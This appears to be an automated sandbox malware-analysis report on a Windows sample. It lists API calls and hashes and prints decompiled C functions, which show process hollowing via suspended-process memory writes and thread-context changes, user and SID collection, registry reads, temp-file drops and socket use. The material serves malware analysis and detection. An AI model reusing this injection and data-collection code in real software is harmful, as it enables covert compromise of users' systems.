                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$PromptOnSecureDesktop$kernel32
                                                                                • API String ID: 1082366364-2834986871
                                                                                • Opcode ID: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                • Opcode Fuzzy Hash: 174e8731fdbdc44ab974895aa40a4ab233de6b35a5efa5658db69bb206ac9e39
                                                                                • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E0040977C(void* __ecx, CHAR* _a4) {
                                                                                				struct _PROCESS_INFORMATION _v20;
                                                                                				void _v24;
                                                                                				char _v28;
                                                                                				struct _STARTUPINFOA _v96;
                                                                                				struct _CONTEXT _v812;
                                                                                				void* _t33;
                                                                                
                                                                                				_t46 = __ecx;
                                                                                				E0040EE2A(__ecx,  &_v96, 0, 0x44);
                                                                                				_v96.cb = 0x44;
                                                                                				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
                                                                                					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
                                                                                					_v812.ContextFlags = 0x10002;
                                                                                					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
                                                                                						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
                                                                                						_push(0);
                                                                                						if(_t33 == 0) {
                                                                                							L4:
                                                                                							TerminateProcess(_v20.hProcess, ??);
                                                                                							goto L1;
                                                                                						}
                                                                                						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						_v812.Eax = _v28;
                                                                                						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						ResumeThread(_v20.hThread);
                                                                                						return 1;
                                                                                					}
                                                                                					L3:
                                                                                					_push(0);
                                                                                					goto L4;
                                                                                				}
                                                                                				L1:
                                                                                				return 0;
                                                                                			}
                                                                                Address column (one instruction address per decompiled statement above, 0x0040977c through 0x00409863; the per-statement mapping was detached from the code during extraction)

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,PromptOnSecureDesktop), ref: 004097B1
                                                                                • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097EB
                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097F9
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 00409831
                                                                                • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040984E
                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040985B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D$PromptOnSecureDesktop
                                                                                • API String ID: 2981417381-1403908072
                                                                                • Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                • Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 020867C3
                                                                                • htonl.WS2_32(?), ref: 020867DF
                                                                                • htonl.WS2_32(?), ref: 020867EE
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 020868F1
                                                                                • ExitProcess.KERNEL32 ref: 020869BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Processhtonl$CurrentExitHugeRead
                                                                                • String ID: except_info$localcfg
                                                                                • API String ID: 1150517154-3605449297
                                                                                • Opcode ID: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
                                                                                • Instruction ID: 8d48a37e97df5aeacc8562e5290ccda38d559f7cb32ce2094811506da341a246
                                                                                • Opcode Fuzzy Hash: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
                                                                                • Instruction Fuzzy Hash: FE615E71A40308AFDB60AFB4DC45FEA77E9FB08300F148066FAADD2161EB7599909F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • htons.WS2_32(0208CC84), ref: 0208F5B4
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0208F5CE
                                                                                • closesocket.WS2_32(00000000), ref: 0208F5DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                • Instruction ID: f2fa2add3c1d964694db8bd94245ff0733faee41245f38ef13adea976e3f5593
                                                                                • Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                • Instruction Fuzzy Hash: EC315A72900219ABDB11AFB5DC889EF7BBCEB88350F104566FA45E3150E7708A919BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00406F5F(long _a4, long _a8) {
                                                                                				void* _v8;
                                                                                				long _v12;
                                                                                				union _SID_NAME_USE _v16;
                                                                                				void _v84;
                                                                                				char _v212;
                                                                                				CHAR* _t36;
                                                                                				void* _t53;
                                                                                				intOrPtr* _t54;
                                                                                				char _t62;
                                                                                				void* _t65;
                                                                                				char* _t66;
                                                                                				intOrPtr _t67;
                                                                                				CHAR* _t68;
                                                                                				void* _t69;
                                                                                
                                                                                				_t68 = _a4;
                                                                                				 *_t68 = 0;
                                                                                				if(GetUserNameA(_t68,  &_a8) == 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_t36 = _t68;
                                                                                				_t66 =  &(_t36[1]);
                                                                                				do {
                                                                                					_t62 =  *_t36;
                                                                                					_t36 =  &(_t36[1]);
                                                                                				} while (_t62 != 0);
                                                                                				_a8 = _t36 - _t66;
                                                                                				_a4 = 0x7c;
                                                                                				_v12 = 0x80;
                                                                                				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
                                                                                					L8:
                                                                                					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
                                                                                					return _a8;
                                                                                				}
                                                                                				E0040EF00( &(_t68[_a8]), "/");
                                                                                				_a8 = _a8 + 1;
                                                                                				_push( &_v8);
                                                                                				_t53 =  &_v84;
                                                                                				_push(_t53);
                                                                                				L0040F4AA();
                                                                                				if(_t53 == 0) {
                                                                                					goto L8;
                                                                                				}
                                                                                				_t54 = _v8;
                                                                                				_t20 = _t54 + 1; // 0x121
                                                                                				_t65 = _t20;
                                                                                				do {
                                                                                					_t67 =  *_t54;
                                                                                					_t54 = _t54 + 1;
                                                                                				} while (_t67 != 0);
                                                                                				_a4 = _t54 - _t65;
                                                                                				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
                                                                                				_a8 = _a8 + _a4;
                                                                                				_t69 = _t69 + 0xc;
                                                                                				LocalFree(_v8);
                                                                                				goto L8;
                                                                                			}


                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                • wsprintfA.USER32 ref: 00407036
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                • String ID: /%d$|
                                                                                • API String ID: 676856371-4124749705
                                                                                • Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                • Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
                                                                                • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?), ref: 02082FA1
                                                                                • LoadLibraryA.KERNEL32(?), ref: 02082FB1
                                                                                • GetProcAddress.KERNEL32(00000000,004103F0), ref: 02082FC8
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02083000
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02083007
                                                                                • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 02083032
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                • String ID: dnsapi.dll
                                                                                • API String ID: 1242400761-3175542204
                                                                                • Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                • Instruction ID: f3fc77bd00f95d34168370d4fc717fbddc257c3a9fb1d10f28fa8cc22fd05e79
                                                                                • Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                • Instruction Fuzzy Hash: 0B219271D00729BBCB22AB94DC48AEFBBB8EF48B14F004461F941E7141D7B49A81DBD4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 43%
                                                                                			E00406BA7(CHAR* _a4) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				long _t14;
                                                                                				int _t19;
                                                                                				void* _t28;
                                                                                				void* _t39;
                                                                                
                                                                                				_push(_t30);
                                                                                				if(IsBadCodePtr( *0x4130ac) == 0) {
                                                                                					_push( &_v8);
                                                                                					_push(0);
                                                                                					if( *0x4130ac() == 0) {
                                                                                						_t28 = E0040EBCC(_v8);
                                                                                						if(_t28 == 0) {
                                                                                							L7:
                                                                                							_t14 = 0;
                                                                                						} else {
                                                                                							_push( &_v8);
                                                                                							_push(_t28);
                                                                                							if( *0x4130ac() == 0) {
                                                                                								_v12 = 0;
                                                                                								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                								if(_t39 != 0xffffffff) {
                                                                                									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
                                                                                									_push(_t39);
                                                                                									if(_t19 != 0) {
                                                                                										CloseHandle();
                                                                                										E0040EC2E(_t28);
                                                                                										_t14 = _v8;
                                                                                									} else {
                                                                                										CloseHandle();
                                                                                										DeleteFileA(_a4);
                                                                                										goto L9;
                                                                                									}
                                                                                								} else {
                                                                                									L9:
                                                                                									E0040EC2E(_t28);
                                                                                									_t14 = 0;
                                                                                								}
                                                                                							} else {
                                                                                								E0040EC2E(_t28);
                                                                                								goto L7;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_t14 = 0;
                                                                                					}
                                                                                					return _t14;
                                                                                				} else {
                                                                                					return 0;
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3609698214-2980165447
                                                                                • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,02087043), ref: 02086F4E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02086F55
                                                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02086F7B
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02086F92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$PromptOnSecureDesktop$\\.\pipe\seokopfr
                                                                                • API String ID: 1082366364-3324671110
                                                                                • Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                • Instruction ID: c0bd8873821a63704d3387d6d9b9e99f63c7b9e3e795c2ef59342c5f425780fa
                                                                                • Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                • Instruction Fuzzy Hash: 902104617403407DF76373319C8CFFB2E8C8B52724F2840A5F984D6591DBD984D6966D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 63%
                                                                                			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
                                                                                				long _v8;
                                                                                				char _v1032;
                                                                                				signed int _t29;
                                                                                				signed int _t62;
                                                                                				void* _t64;
                                                                                
                                                                                				GetTempPathA(0x400,  &_v1032);
                                                                                				E00408274( &_v1032);
                                                                                				_t29 = E0040ECA5();
                                                                                				_t62 = 9;
                                                                                				_push(_t29 % _t62);
                                                                                				_push(E0040ECA5() % _t62);
                                                                                				_push(E0040ECA5() % _t62);
                                                                                				_push(E0040ECA5() % _t62);
                                                                                				_push( &_v1032);
                                                                                				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
                                                                                				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
                                                                                				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
                                                                                				if(_t64 <= 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
                                                                                				CloseHandle(_t64);
                                                                                				return 1;
                                                                                 			}

                                                                                 Statement addresses: 0x0040907b, 0x00409088, 0x0040908e, 0x00409095, 0x0040909c, 0x004090a8, 0x004090b4, 0x004090c9, 0x004090ca, 0x004090e9, 0x004090f8, 0x00409114, 0x00409118, 0x00000000, 0x0040913f, 0x0040912d, 0x00409134, 0x00000000

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                • wsprintfA.USER32 ref: 004090E9
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2439722600-2980165447
                                                                                • Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                • Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?), ref: 020892E2
                                                                                • wsprintfA.USER32 ref: 02089350
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02089375
                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 02089389
                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 02089394
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0208939B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2439722600-2980165447
                                                                                • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                • Instruction ID: 8cbabf148e6aa2465cd4a58c27dc0634c28c63623dd077f2c4927a69c44838fb
                                                                                • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                • Instruction Fuzzy Hash: DB1172B27406247BE7207732EC0DFEF3A6EDBC8B11F008065BB49A5191EBB44A459B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02089A18
                                                                                • GetThreadContext.KERNEL32(?,?), ref: 02089A52
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 02089A60
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02089A98
                                                                                • SetThreadContext.KERNEL32(?,00010002), ref: 02089AB5
                                                                                • ResumeThread.KERNEL32(?), ref: 02089AC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D
                                                                                • API String ID: 2981417381-2746444292
                                                                                • Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                • Instruction ID: 17c4471a119d96f0040c32f6f5c15383d851344a2d2f07ced2f440c76a4e044b
                                                                                • Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                • Instruction Fuzzy Hash: EE216BB1A01219BBDB12ABA1DC08EEF7BBCEF04750F404061FA19E1150E7718A40DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • inet_addr.WS2_32(004102D8), ref: 02081C18
                                                                                • LoadLibraryA.KERNEL32(004102C8), ref: 02081C26
                                                                                • GetProcessHeap.KERNEL32 ref: 02081C84
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 02081C9D
                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 02081CC1
                                                                                • HeapFree.KERNEL32(?,00000000,00000000), ref: 02081D02
                                                                                • FreeLibrary.KERNEL32(?), ref: 02081D0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
                                                                                • String ID:
                                                                                • API String ID: 2324436984-0
                                                                                • Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                • Instruction ID: 49cc952ca1260fe180e50dfde48c7bbb928e0981796092fa327e2b617c756526
                                                                                • Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                • Instruction Fuzzy Hash: 15315E32D00309BFCB52AFA4DC889AFFBF9EF45305B24447AE549A2110D7B54E81EB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
                                                                                				int* _v8;
                                                                                				int _v12;
                                                                                				void* _v16;
                                                                                				intOrPtr _v20;
                                                                                				int _v24;
                                                                                				int _v28;
                                                                                				int _v32;
                                                                                				int* _v36;
                                                                                				char _v68;
                                                                                				intOrPtr* _t52;
                                                                                				int _t69;
                                                                                				int _t78;
                                                                                				intOrPtr _t80;
                                                                                				void* _t82;
                                                                                				void* _t84;
                                                                                				void* _t85;
                                                                                				int _t89;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                
                                                                                				_t82 = __edx;
                                                                                				_v36 = 0;
                                                                                				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
                                                                                					L16:
                                                                                					return _v36;
                                                                                				}
                                                                                				_t52 = _a12;
                                                                                				_t89 = 0;
                                                                                				_t6 = _t52 + 1; // 0x4128f9
                                                                                				_t84 = _t6;
                                                                                				do {
                                                                                					_t80 =  *_t52;
                                                                                					_t52 = _t52 + 1;
                                                                                				} while (_t80 != 0);
                                                                                				_t85 = _t52 - _t84;
                                                                                				_v8 = 0;
                                                                                				if(_t85 > 0x1c) {
                                                                                					_t85 = 0x1c;
                                                                                				}
                                                                                				E0040EE08( &_v68, _a12, _t85);
                                                                                				_t56 = _t91 + _t85 - 0x40;
                                                                                				_v12 = 0;
                                                                                				_v20 = _t91 + _t85 - 0x40;
                                                                                				E0040F1ED(0, _t56, 0xa);
                                                                                				_t93 = _t92 + 0x18;
                                                                                				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
                                                                                					L15:
                                                                                					RegCloseKey(_v16);
                                                                                					goto L16;
                                                                                				} else {
                                                                                					do {
                                                                                						_t89 = _t89 + _v12;
                                                                                						_v8 = _v8 + 1;
                                                                                						_v12 = 0;
                                                                                						E0040F1ED(_v8, _v20, 0xa);
                                                                                						_t93 = _t93 + 0xc;
                                                                                					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
                                                                                					if(_t89 <= 0) {
                                                                                						goto L15;
                                                                                					}
                                                                                					_v32 = _t89;
                                                                                					E0040DB2E(_t89);
                                                                                					_t69 =  *0x4136c4;
                                                                                					if(_t69 == 0) {
                                                                                						goto L15;
                                                                                					}
                                                                                					_v12 = _t69;
                                                                                					_v8 = 0;
                                                                                					while(1) {
                                                                                						_v28 = _t89;
                                                                                						E0040F1ED(_v8, _v20, 0xa);
                                                                                						_t93 = _t93 + 0xc;
                                                                                						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t78 = _v28;
                                                                                						if(_t78 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_v12 =  &(_v12[_t78]);
                                                                                						_t89 = _t89 - _t78;
                                                                                						_v8 = _v8 + 1;
                                                                                						if(_t89 > 0) {
                                                                                							continue;
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_t106 = _t89;
                                                                                					if(_t89 == 0) {
                                                                                						E00402544( *0x4136c4,  *0x4136c4, _v32, 0xe4, 0xc8);
                                                                                						E0040E332(_t82, _t106,  *0x4136c4, _v32);
                                                                                						_v36 = 1;
                                                                                					}
                                                                                					goto L15;
                                                                                				}
                                                                                			}
                                                                                Instruction addresses (one per C line above, 0x00000000 for labels and jumps): 0x0040e3ca 0x0040e3e0 0x0040e3ee 0x0040e528 0x0040e52d 0x0040e52d 0x0040e3f4 0x0040e3f9 0x0040e3fb 0x0040e3fb 0x0040e3fe 0x0040e3fe 0x0040e400 0x0040e401 0x0040e407 0x0040e409 0x0040e40f 0x0040e413 0x0040e413 0x0040e41c 0x0040e421 0x0040e429 0x0040e42c 0x0040e42f 0x0040e43a 0x0040e452 0x0040e51d 0x0040e520 0x00000000 0x0040e458 0x0040e458 0x0040e458 0x0040e45b 0x0040e463 0x0040e469 0x0040e46e 0x0040e484 0x0040e48a 0x00000000 0x00000000 0x0040e491 0x0040e494 0x0040e499 0x0040e4a1 0x00000000 0x00000000 0x0040e4a3 0x0040e4a6 0x0040e4a9 0x0040e4ae 0x0040e4b4 0x0040e4b9 0x0040e4d3 0x00000000 0x00000000 0x0040e4d5 0x0040e4da 0x00000000 0x00000000 0x0040e4dc 0x0040e4df 0x0040e4e1 0x0040e4e6 0x00000000 0x00000000 0x00000000 0x0040e4e6 0x0040e4e8 0x0040e4ea 0x0040e500 0x0040e50e 0x0040e516 0x0040e516 0x00000000 0x0040e4ea

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,PromptOnSecureDesktop), ref: 0040E3E6
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                Strings
                                                                                Memory Dump Source
